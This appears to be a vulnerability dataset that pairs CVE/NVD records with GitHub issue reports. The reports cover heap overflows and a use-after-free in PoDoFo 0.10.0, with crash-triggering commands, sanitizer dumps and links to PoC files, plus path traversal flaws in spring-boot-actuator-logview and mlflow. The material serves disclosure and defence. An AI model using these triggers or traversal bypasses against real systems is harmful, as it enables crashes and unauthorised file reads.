#4 0x6768ec in std::unique_ptr<PoDoFo::PdfEncrypt, std::default_delete<PoDoFo::PdfEncrypt> >::operator=(std::unique_ptr<PoDoFo::PdfEncrypt, std::default_delete<PoDoFo::PdfEncrypt> >&&) /usr/lib/gcc/x86_64-linux-gnu/9/../../../../include/c++/9/bits/unique_ptr.h:307:2
#5 0x675e46 in PoDoFo::PdfMemDocument::SetEncrypted(std::basic_string_view<char, std::char_traits<char> > const&, std::basic_string_view<char, std::char_traits<char> > const&, PoDoFo::PdfPermissions, PoDoFo::PdfEncryptAlgorithm, PoDoFo::PdfKeyLength) /root/target/Invariants/podofo-0.10.0/src/podofo/main/PdfMemDocument.cpp:321:15
#6 0x4dfe4b in encrypt(std::basic_string_view<char, std::char_traits<char> > const&, std::basic_string_view<char, std::char_traits<char> > const&, std::basic_string_view<char, std::char_traits<char> > const&, std::basic_string_view<char, std::char_traits<char> > const&, PoDoFo::PdfEncryptAlgorithm, PoDoFo::PdfPermissions) /root/target/Invariants/podofo-0.10.0/tools/podofoencrypt/podofoencrypt.cpp:48:9
#7 0x4e1112 in main /root/target/Invariants/podofo-0.10.0/tools/podofoencrypt/podofoencrypt.cpp:200:9
#8 0x7f70c1549082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16
previously allocated by thread T0 here:
#0 0x4dd2dd in operator new(unsigned long) /root/test/fuzzing_python/llvm-project-llvmorg-12.0.0/compiler-rt/lib/asan/asan_new_delete.cpp:99:3
#1 0x5a387f in PoDoFo::PdfEncrypt::CreateFromObject(PoDoFo::PdfObject const&) /root/target/Invariants/podofo-0.10.0/src/podofo/main/PdfEncrypt.cpp:586:43
#2 0x6f2e88 in PoDoFo::PdfParser::ReadObjects(PoDoFo::InputStreamDevice&) /root/target/Invariants/podofo-0.10.0/src/podofo/main/PdfParser.cpp:631:29
#3 0x6f09f3 in PoDoFo::PdfParser::Parse(PoDoFo::InputStreamDevice&, bool) /root/target/Invariants/podofo-0.10.0/src/podofo/main/PdfParser.cpp:83:9
#4 0x67071e in PoDoFo::PdfMemDocument::loadFromDevice(std::shared_ptr<PoDoFo::InputStreamDevice> const&, std::basic_string_view<char, std::char_traits<char> > const&) /root/target/Invariants/podofo-0.10.0/src/podofo/main/PdfMemDocument.cpp:148:12
#5 0x671fcd in PoDoFo::PdfMemDocument::LoadFromDevice(std::shared_ptr<PoDoFo::InputStreamDevice> const&, std::basic_string_view<char, std::char_traits<char> > const&) /root/target/Invariants/podofo-0.10.0/src/podofo/main/PdfMemDocument.cpp:137:5
#6 0x671bdb in PoDoFo::PdfMemDocument::Load(std::basic_string_view<char, std::char_traits<char> > const&, std::basic_string_view<char, std::char_traits<char> > const&) /root/target/Invariants/podofo-0.10.0/src/podofo/main/PdfMemDocument.cpp:119:5
#7 0x4dfd57 in encrypt(std::basic_string_view<char, std::char_traits<char> > const&, std::basic_string_view<char, std::char_traits<char> > const&, std::basic_string_view<char, std::char_traits<char> > const&, std::basic_string_view<char, std::char_traits<char> > const&, PoDoFo::PdfEncryptAlgorithm, PoDoFo::PdfPermissions) /root/target/Invariants/podofo-0.10.0/tools/podofoencrypt/podofoencrypt.cpp:19:9
#8 0x4e1112 in main /root/target/Invariants/podofo-0.10.0/tools/podofoencrypt/podofoencrypt.cpp:200:9
#9 0x7f70c1549082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16
SUMMARY: AddressSanitizer: heap-use-after-free /root/target/Invariants/podofo-0.10.0/src/podofo/main/PdfEncrypt.h:352:47 in PoDoFo::PdfEncrypt::IsMetadataEncrypted() const
Shadow bytes around the buggy address:
0x0c267fff8010: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c267fff8020: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c267fff8030: fd fd fd fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c267fff8040: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c267fff8050: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
=>0x0c267fff8060:[fd]fd fd fd fd fd fd fd fd fd fd fd fa fa fa fa
0x0c267fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c267fff8080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c267fff8090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c267fff80a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c267fff80b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==3903368==ABORTING
```
**Environment**
- OS: Ubuntu 20.04.1
- clang:12.0.0
- podofo:0.10.0
we built podofo with AddressSanitizer (ASAN) .
`cmake -DCMAKE_CXX_COMPILER=clang++ -DCMAKE_C_COMPILER=clang -DCMAKE_C_FLAGS="-O0 -fsanitize=address" -DCMAKE_CXX_FLAGS="-O0 -fsanitize=address"`
[poc_file.zip](https://github.com/podofo/podofo/files/11316290/poc_file.zip)
| Heap-use-after-free in podofo 0.10.0(main/PdfEncrypt.h:352:47 in PoDoFo::PdfEncrypt::IsMetadataEncrypted()) | https://api.github.com/repos/podofo/podofo/issues/70/comments | 3 | 2023-04-25T03:59:25Z | 2023-06-27T21:14:29Z | https://github.com/podofo/podofo/issues/70 | 1,682,386,495 | 70 | 5,110 |
CVE-2023-31567 | 2023-05-10T16:15:12.720 | Podofo v0.10.0 was discovered to contain a heap buffer overflow via the component PoDoFo::PdfEncryptAESV3::PdfEncryptAESV3. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/podofo/podofo/issues/71"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/podofo/podofo/issues/71"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:podofo_project:podofo:0.10.0:*:*:*:*:*:*:*",
"matchCriteriaId": "9D2B6FCB-1882-4BAA-B8BE-25E150D012D7",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/podofo/podofo/issues/71 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"podofo",
"podofo"
] | We found multiple heap-buffer-overflow in podofo 0.10.0(main/PdfEncrypt.cpp in PoDoFo::PdfEncryptAESV3::PdfEncryptAESV3).
**Command Input**
`podofoencrypt -rc4v2 -u 1232321 -o 24 poc_file /dev/null`
All poc_file are attached.
**Sanitizer Dump**
```
==3904316==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x603000000e0b at pc 0x0000004ab577 bp 0x7ffe4a6cc310 sp 0x7ffe4a6cbad8
READ of size 32 at 0x603000000e0b thread T0
#0 0x4ab576 in __asan_memcpy /root/test/fuzzing_python/llvm-project-llvmorg-12.0.0/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cpp:22:3
#1 0x5bcdd7 in PoDoFo::PdfEncryptAESV3::PdfEncryptAESV3(PoDoFo::PdfString, PoDoFo::PdfString, PoDoFo::PdfString, PoDoFo::PdfString, PoDoFo::PdfPermissions, PoDoFo::PdfString, PoDoFo::PdfAESV3Revision) /root/target/Invariants/podofo-0.10.0/src/podofo/main/PdfEncrypt.cpp:1908:5
#2 0x5a39a5 in PoDoFo::PdfEncrypt::CreateFromObject(PoDoFo::PdfObject const&) /root/target/Invariants/podofo-0.10.0/src/podofo/main/PdfEncrypt.cpp:586:47
#3 0x6f2e88 in PoDoFo::PdfParser::ReadObjects(PoDoFo::InputStreamDevice&) /root/target/Invariants/podofo-0.10.0/src/podofo/main/PdfParser.cpp:631:29
#4 0x6f09f3 in PoDoFo::PdfParser::Parse(PoDoFo::InputStreamDevice&, bool) /root/target/Invariants/podofo-0.10.0/src/podofo/main/PdfParser.cpp:83:9
#5 0x67071e in PoDoFo::PdfMemDocument::loadFromDevice(std::shared_ptr<PoDoFo::InputStreamDevice> const&, std::basic_string_view<char, std::char_traits<char> > const&) /root/target/Invariants/podofo-0.10.0/src/podofo/main/PdfMemDocument.cpp:148:12
#6 0x671fcd in PoDoFo::PdfMemDocument::LoadFromDevice(std::shared_ptr<PoDoFo::InputStreamDevice> const&, std::basic_string_view<char, std::char_traits<char> > const&) /root/target/Invariants/podofo-0.10.0/src/podofo/main/PdfMemDocument.cpp:137:5
#7 0x671bdb in PoDoFo::PdfMemDocument::Load(std::basic_string_view<char, std::char_traits<char> > const&, std::basic_string_view<char, std::char_traits<char> > const&) /root/target/Invariants/podofo-0.10.0/src/podofo/main/PdfMemDocument.cpp:119:5
#8 0x4dfd57 in encrypt(std::basic_string_view<char, std::char_traits<char> > const&, std::basic_string_view<char, std::char_traits<char> > const&, std::basic_string_view<char, std::char_traits<char> > const&, std::basic_string_view<char, std::char_traits<char> > const&, PoDoFo::PdfEncryptAlgorithm, PoDoFo::PdfPermissions) /root/target/Invariants/podofo-0.10.0/tools/podofoencrypt/podofoencrypt.cpp:19:9
#9 0x4e1112 in main /root/target/Invariants/podofo-0.10.0/tools/podofoencrypt/podofoencrypt.cpp:200:9
#10 0x7fc7de7ed082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16
#11 0x430f6d in _start (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofoencrypt+0x430f6d)
0x603000000e0b is located 0 bytes to the right of 27-byte region [0x603000000df0,0x603000000e0b)
allocated by thread T0 here:
#0 0x4dd2dd in operator new(unsigned long) /root/test/fuzzing_python/llvm-project-llvmorg-12.0.0/compiler-rt/lib/asan/asan_new_delete.cpp:99:3
#1 0x7fc7dec9d87f in std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >::reserve(unsigned long) (/lib/x86_64-linux-gnu/libstdc++.so.6+0x14387f)
#2 0x7d5c2a in PoDoFo::StandardStreamDevice::readChar(char&) /root/target/Invariants/podofo-0.10.0/src/podofo/auxiliary/StreamDevice.cpp:290:12
SUMMARY: AddressSanitizer: heap-buffer-overflow /root/test/fuzzing_python/llvm-project-llvmorg-12.0.0/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cpp:22:3 in __asan_memcpy
Shadow bytes around the buggy address:
0x0c067fff8170: fd fd fd fa fa fa 00 00 00 fa fa fa 00 00 00 fa
0x0c067fff8180: fa fa 00 00 00 fa fa fa fd fd fd fa fa fa 00 00
0x0c067fff8190: 00 fa fa fa fd fd fd fa fa fa fd fd fd fd fa fa
0x0c067fff81a0: 00 00 00 fa fa fa 00 00 00 00 fa fa 00 00 00 fa
0x0c067fff81b0: fa fa fd fd fd fa fa fa fd fd fd fd fa fa 00 00
=>0x0c067fff81c0: 00[03]fa fa 00 00 00 fa fa fa 00 00 00 00 fa fa
0x0c067fff81d0: 00 00 00 fa fa fa fd fd fd fa fa fa 00 00 00 fa
0x0c067fff81e0: fa fa fd fd fd fa fa fa fd fd fd fd fa fa 00 00
0x0c067fff81f0: 01 fa fa fa 00 00 00 fa fa fa 00 00 00 00 fa fa
0x0c067fff8200: 00 00 00 fa fa fa fd fd fd fa fa fa 00 00 00 fa
0x0c067fff8210: fa fa fd fd fd fa fa fa 00 00 00 fa fa fa 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==3904316==ABORTING
```
**Environment**
- OS: Ubuntu 20.04.1
- clang:12.0.0
- podofo:0.10.0
we built podofo with AddressSanitizer (ASAN) .
`cmake -DCMAKE_CXX_COMPILER=clang++ -DCMAKE_C_COMPILER=clang -DCMAKE_C_FLAGS="-O0 -fsanitize=address" -DCMAKE_CXX_FLAGS="-O0 -fsanitize=address"`
[poc_files.zip](https://github.com/podofo/podofo/files/11316403/poc_files.zip)
| Heap-buffer-overflow in podofo 0.10.0(main/PdfEncrypt.cpp in PoDoFo::PdfEncryptAESV3::PdfEncryptAESV3) | https://api.github.com/repos/podofo/podofo/issues/71/comments | 1 | 2023-04-25T04:12:26Z | 2023-06-28T08:43:22Z | https://github.com/podofo/podofo/issues/71 | 1,682,396,886 | 71 | 5,111 |
CVE-2023-31568 | 2023-05-10T16:15:12.810 | Podofo v0.10.0 was discovered to contain a heap buffer overflow via the component PoDoFo::PdfEncryptRC4::PdfEncryptRC4. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/podofo/podofo/issues/72"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/podofo/podofo/issues/72"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:podofo_project:podofo:0.10.0:*:*:*:*:*:*:*",
"matchCriteriaId": "9D2B6FCB-1882-4BAA-B8BE-25E150D012D7",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/podofo/podofo/issues/72 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"podofo",
"podofo"
] | We found a heap-buffer-overflow in podofo 0.10.0(main/PdfEncrypt.cpp:1132:5 in PoDoFo::PdfEncryptRC4::PdfEncryptRC4).
**Command Input**
`podofopdfinfo poc_file `
poc_file is attached.
**Sanitizer Dump**
```
==3975233==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60300000122f at pc 0x0000004ab677 bp 0x7ffc5060df20 sp 0x7ffc5060d6e8
READ of size 32 at 0x60300000122f thread T0
#0 0x4ab676 in __asan_memcpy /root/test/fuzzing_python/llvm-project-llvmorg-12.0.0/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cpp:22:3
#1 0x64570f in PoDoFo::PdfEncryptRC4::PdfEncryptRC4(PoDoFo::PdfString, PoDoFo::PdfString, PoDoFo::PdfPermissions, int, PoDoFo::PdfEncryptAlgorithm, int, bool) /root/target/Invariants/podofo-0.10.0/src/podofo/main/PdfEncrypt.cpp:1132:5
#2 0x638356 in PoDoFo::PdfEncrypt::CreateFromObject(PoDoFo::PdfObject const&) /root/target/Invariants/podofo-0.10.0/src/podofo/main/PdfEncrypt.cpp:556:43
#3 0x79b3a8 in PoDoFo::PdfParser::ReadObjects(PoDoFo::InputStreamDevice&) /root/target/Invariants/podofo-0.10.0/src/podofo/main/PdfParser.cpp:631:29
#4 0x798f13 in PoDoFo::PdfParser::Parse(PoDoFo::InputStreamDevice&, bool) /root/target/Invariants/podofo-0.10.0/src/podofo/main/PdfParser.cpp:83:9
#5 0x71c42e in PoDoFo::PdfMemDocument::loadFromDevice(std::shared_ptr<PoDoFo::InputStreamDevice> const&, std::basic_string_view<char, std::char_traits<char> > const&) /root/target/Invariants/podofo-0.10.0/src/podofo/main/PdfMemDocument.cpp:148:12
#6 0x71dcdd in PoDoFo::PdfMemDocument::LoadFromDevice(std::shared_ptr<PoDoFo::InputStreamDevice> const&, std::basic_string_view<char, std::char_traits<char> > const&) /root/target/Invariants/podofo-0.10.0/src/podofo/main/PdfMemDocument.cpp:137:5
#7 0x71d8eb in PoDoFo::PdfMemDocument::Load(std::basic_string_view<char, std::char_traits<char> > const&, std::basic_string_view<char, std::char_traits<char> > const&) /root/target/Invariants/podofo-0.10.0/src/podofo/main/PdfMemDocument.cpp:119:5
#8 0x4e1be9 in PdfInfoHelper::PdfInfoHelper(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&) /root/target/Invariants/podofo-0.10.0/tools/podofopdfinfo/pdfinfo.cpp:16:12
#9 0x4e06b7 in main /root/target/Invariants/podofo-0.10.0/tools/podofopdfinfo/podofopdfinfo.cpp:94:23
#10 0x7f5ed7b54082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16
#11 0x43106d in _start (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x43106d)
0x60300000122f is located 0 bytes to the right of 31-byte region [0x603000001210,0x60300000122f)
allocated by thread T0 here:
#0 0x4dd3dd in operator new(unsigned long) /root/test/fuzzing_python/llvm-project-llvmorg-12.0.0/compiler-rt/lib/asan/asan_new_delete.cpp:99:3
#1 0x7f5ed800487f in std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >::reserve(unsigned long) (/lib/x86_64-linux-gnu/libstdc++.so.6+0x14387f)
#2 0x87564a in PoDoFo::StandardStreamDevice::readChar(char&) /root/target/Invariants/podofo-0.10.0/src/podofo/auxiliary/StreamDevice.cpp:290:12
#3 0x868d29 in PoDoFo::InputStream::Read(char&) /root/target/Invariants/podofo-0.10.0/src/podofo/auxiliary/InputStream.cpp:53:12
#4 0x7e319a in readHexString(PoDoFo::InputStreamDevice&, PoDoFo::charbuff_t<void>&) /root/target/Invariants/podofo-0.10.0/src/podofo/main/PdfTokenizer.cpp:801:16
LLVMSymbolizer: error reading file: No such file or directory
#5 0x7ffc50612342 ([stack]+0x20342)
SUMMARY: AddressSanitizer: heap-buffer-overflow /root/test/fuzzing_python/llvm-project-llvmorg-12.0.0/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cpp:22:3 in __asan_memcpy
Shadow bytes around the buggy address:
0x0c067fff81f0: 00 fa fa fa 00 00 00 00 fa fa 00 00 00 fa fa fa
0x0c067fff8200: fd fd fd fa fa fa 00 00 00 fa fa fa fd fd fd fa
0x0c067fff8210: fa fa 00 00 00 fa fa fa 00 00 00 fa fa fa 00 00
0x0c067fff8220: 00 fa fa fa fd fd fd fa fa fa 00 00 00 fa fa fa
0x0c067fff8230: 00 00 00 fa fa fa 00 00 00 fa fa fa fd fd fd fa
=>0x0c067fff8240: fa fa 00 00 00[07]fa fa 00 00 00 fa fa fa 00 00
0x0c067fff8250: 00 00 fa fa fd fd fd fa fa fa fd fd fd fa fa fa
0x0c067fff8260: 00 00 00 fa fa fa fd fd fd fd fa fa 00 00 00 00
0x0c067fff8270: fa fa 00 00 00 fa fa fa fd fd fd fa fa fa 00 00
0x0c067fff8280: 00 fa fa fa 00 00 00 00 fa fa 00 00 00 fa fa fa
0x0c067fff8290: fd fd fd fa fa fa fd fd fd fa fa fa fd fd fd fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==3975233==ABORTING
```
**Environment**
- OS: Ubuntu 20.04.1
- clang:12.0.0
- podofo:0.10.0
we built podofo with AddressSanitizer (ASAN) .
`cmake -DCMAKE_CXX_COMPILER=clang++ -DCMAKE_C_COMPILER=clang -DCMAKE_C_FLAGS="-O0 -fsanitize=address" -DCMAKE_CXX_FLAGS="-O0 -fsanitize=address"`
[poc_file.zip](https://github.com/podofo/podofo/files/11318905/poc_file.zip)
| Heap-buffer-overflow in podofo 0.10.0(main/PdfEncrypt.cpp:1132:5 in PoDoFo::PdfEncryptRC4::PdfEncryptRC4) | https://api.github.com/repos/podofo/podofo/issues/72/comments | 2 | 2023-04-25T05:16:58Z | 2023-04-25T12:51:18Z | https://github.com/podofo/podofo/issues/72 | 1,682,445,671 | 72 | 5,112 |
CVE-2023-29986 | 2023-05-11T02:15:08.780 | spring-boot-actuator-logview 0.2.13 allows Directory Traversal to sibling directories via LogViewEndpoint.view. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 1.4,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 1.4,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking"
],
"url": "https://github.com/lukashinsch/spring-boot-actuator-logview/issues/33"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking"
],
"url": "https://github.com/lukashinsch/spring-boot-actuator-logview/issues/33"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:spring-boot-actuator-logview_project:spring-boot-actuator-logview:0.2.13:*:*:*:*:*:*:*",
"matchCriteriaId": "C07110E8-29F7-4F8B-A497-6E6081D13FDF",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"22"
] | 22 | https://github.com/lukashinsch/spring-boot-actuator-logview/issues/33 | [
"Issue Tracking"
] | github.com | [
"lukashinsch",
"spring-boot-actuator-logview"
] | The patch file for CVE-2021-21234 still has a vulnerability, which is a partial path traversal vulnerability.
In commit [1c76e1e](https://github.com/lukashinsch/spring-boot-actuator-logview/commit/1c76e1ec3588c9f39e1a94bf27b5ff56eb8b17d6), the securityCheck function use canonicalLoggingPath.startsWith(baseCanonicalPath) to check for path traversal vulnerabilities. But it still allows a malicious actor to potentially break out of the expected directory. The impact is limited to sibling directories. For example, userControlled.getCanonicalPath().startsWith("/usr/out") will allow an attacker to access a directory with a name like /usr/outnot.
Comparing paths with the java.nio.files.Path#startsWith will adequately protect againts this vulnerability.
For example: file.getCanonicalFile().toPath().startsWith(BASE_DIRECTORY) or file.getCanonicalFile().toPath().startsWith(BASE_DIRECTORY_FILE.getCanonicalFile().toPath()) | Issue about Partial Path Traversal | https://api.github.com/repos/lukashinsch/spring-boot-actuator-logview/issues/33/comments | 0 | 2023-02-12T11:17:09Z | 2023-02-12T11:17:09Z | https://github.com/lukashinsch/spring-boot-actuator-logview/issues/33 | 1,581,218,091 | 33 | 5,113 |
CVE-2023-30172 | 2023-05-11T02:15:08.880 | A directory traversal vulnerability in the /get-artifact API method of the mlflow platform up to v2.0.1 allows attackers to read arbitrary files on the server via the path parameter. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking"
],
"url": "https://github.com/mlflow/mlflow/issues/7166"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking"
],
"url": "https://github.com/mlflow/mlflow/issues/7166#issuecomment-1541543234"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking"
],
"url": "https://github.com/mlflow/mlflow/issues/7166"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking"
],
"url": "https://github.com/mlflow/mlflow/issues/7166#issuecomment-1541543234"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E8083039-5842-4214-A757-1A798CA15C30",
"versionEndExcluding": "2.0.1",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"22"
] | 22 | https://github.com/mlflow/mlflow/issues/7166 | [
"Issue Tracking"
] | github.com | [
"mlflow",
"mlflow"
] | **Vulnerability details**
Local file inclusion in the MLFlow server, additional details may be provided upon request.
**MLFlow version**
Reproduced in 1.26.1 and 1.30.0 | [BUG] Security Vulnerability | https://api.github.com/repos/mlflow/mlflow/issues/7166/comments | 10 | 2022-10-26T07:09:54Z | 2023-05-11T07:53:56Z | https://github.com/mlflow/mlflow/issues/7166 | 1,423,542,761 | 7,166 | 5,114 |
CVE-2023-30172 | 2023-05-11T02:15:08.880 | A directory traversal vulnerability in the /get-artifact API method of the mlflow platform up to v2.0.1 allows attackers to read arbitrary files on the server via the path parameter. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
